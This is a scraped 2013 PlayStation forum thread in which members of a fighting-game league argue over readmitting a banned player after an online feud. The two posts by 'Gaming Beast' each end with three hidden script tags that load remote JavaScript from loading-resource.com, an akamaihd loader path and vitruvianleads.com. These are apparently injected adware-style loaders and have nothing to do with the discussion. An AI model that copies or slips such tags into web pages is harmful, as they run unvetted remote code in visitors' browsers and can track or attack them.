Survivor
2365 posts

Re: Pasta Stadium Leagues: One Last Chance To Join!

Jan 29, 2013

@Asis

The community at Pasta Stadium Leagues is suppossed to be a positive community for everyone who's a part of it.

You've got some serious skill, but after talking it over with various people and thinking on it myself, I can't really let you back into the league. (In case you don't remember I had to ban you from it before) until that kind of behavior that sparks drama and such is changed. You'd just end up breaking the code of conduct immediately after I added you.

But if you want to come to tournaments I will allow that, as I know it is hard to find the kind of competition we attract and you want to play good players as long as you are polite and friendly during the tournaments.

Message 41 of 63 (82 Views)
0 Likes
Gaming Beast
2167 posts

Jan 29, 2013
No "It's okay until you break a rule"?

To be fair I can think of a couple members of the league who tend to break these rules too...

The Fro never sleeps.png

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Message 42 of 63 (76 Views)
0 Likes
Survivor
2365 posts

Jan 29, 2013
Yes and a lot of them have been talked too. Some have also been evicted over time.

The major reason is that I don't want to attract outside drama onto the site. And we must admit, Asis has started some drama on this forum.
Message 43 of 63 (74 Views)
0 Likes
Wastelander
768 posts

Jan 29, 2013

Aylas_Hero wrote:
Yes and a lot of them have been talked too. Some have also been evicted over time.

The major reason is that I don't want to attract outside drama onto the site. And we must admit, Asis has started some drama on this forum.

its whatever but i dont understand why you would want to use me to help bring people in by having me go to your tournies and what not but wont let me in the league because you think you know im gonna break the rules?? what kind of bs is that.  How are you going to tell me what im going to do before i do it.  You dont even know me like that.  wow thats really messed up bro

YT: DatTeamAxcel for all my latest PSAS related content. I upload everything FFAs 2v2 1v1, Combo & How to Videos, and Player and character breakdowns.
Message 44 of 63 (72 Views)
Hekseville Citizen
286 posts

Jan 29, 2013
@Asis
Wow, maybe you should've ended that fight with pb amicably.

But I digress, I'd like to sign up Aylas but I need you to test my connection. If it's not consistent enough and I can't join then fine but I don;t want to sit around and let my skills go to waste on random FFA matches.
Message 45 of 63 (68 Views)
0 Likes
Wastelander
768 posts

Jan 29, 2013

RodBow15 wrote:
@Asis
Wow, maybe you should've ended that fight with pb amicably.

But I digress, I'd like to sign up Aylas but I need you to test my connection. If it's not consistent enough and I can't join then fine but I don;t want to sit around and let my skills go to waste on random FFA matches.

it ended how it needed to end. He brought that on himself.  And I saw what you said in that other thread about me.  You should talk about things unless you know all the details.  Because you really have no idea how that 1v1 even came to be yet everyone seems to think I started that mess.  This forum really makes me sick sometimes matter of fact most of the time

YT: DatTeamAxcel for all my latest PSAS related content. I upload everything FFAs 2v2 1v1, Combo & How to Videos, and Player and character breakdowns.
Message 46 of 63 (65 Views)
0 Likes
Survivor
2365 posts

Jan 29, 2013
As soon as I can I'll give it a test RodBow. Smiley Happy

And Asis, it is a fair point. If you can promise me to stop the drama kind of stuff like the expose etc, I will gladly add you into the leagues themselves. I cant have you breaking the code of conduct. And right now you are before you've even joined.

I have nothing against you personally Asis, I wanna make sure you know that. You have skill, and could trash me in a fight as well. But I gotta keep things positive for my site you know?
Message 47 of 63 (63 Views)
0 Likes
Hekseville Citizen
286 posts

Jan 30, 2013
You TOLD me how it started. I know all the details. PB said you were only a good player because you use KC's and he'd beat you if you didn't. I also know that you didn't like him saying he's the best in the world. He's on my friends list and I tell him all the time "stop saying you're the best in the world" especially since I can beat him with Nariko. I also saw your player Breakdown of him as well as the Grudge Match and I read threw those comments on the video as well. I even read your "You aren't the best" rant that I agree with 100%. Thing is, YOU did too much. Trying to "expose" him? For what man? At the end of the day, you could've left it at the video and moved on. I mean those last few seconds where you showed the message exchange should've been a wrap. But from how most people viewed it, it wasn't. That's where all the backlash from the community is coming from.

They all see it as the big guy bullying the little guy ESPECIALLY since you used Cole, KC's or not. And you didn't even stop there. Notice that pb hasn't been back on the forums since? Yet he sends me invites on PSN every time im on .All I know is, you;re in a position I wouldn't want to be in. I know you can get out of it but I don't know how. I'm not HATING on you I would've played him too but I also would've done things differently.
Message 48 of 63 (60 Views)
Survivor
2365 posts

Jan 30, 2013
Pretty Much the post above me.

BUT! Let's not manage to make this thread the same as the others and move on from here.

Is anyone else interested in joining?
Message 49 of 63 (56 Views)
0 Likes
Gaming Beast
2167 posts

Jan 30, 2013
To be perfectly fair, the video seemed rather civil and the breakdown was also both civil and accurate IMO. That being said, the activities (ON BOTH SIDES) before and after the video escalated very quickly.

To be honest, I actually want to be on the next expose. I WANT a player breakdown done of me. Hell, one for Cole and BD if possible. I have no doubt Asis will beat me and I'm okay with that. These things highlight your flaws and tell you what to fix. I don't see that as bad. What was bad was everyone's reactions to it, especially with all the trash talk done beforehand (Which might I add Pb actually started.).

The Fro never sleeps.png

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Message 50 of 63 (55 Views)
0 Likes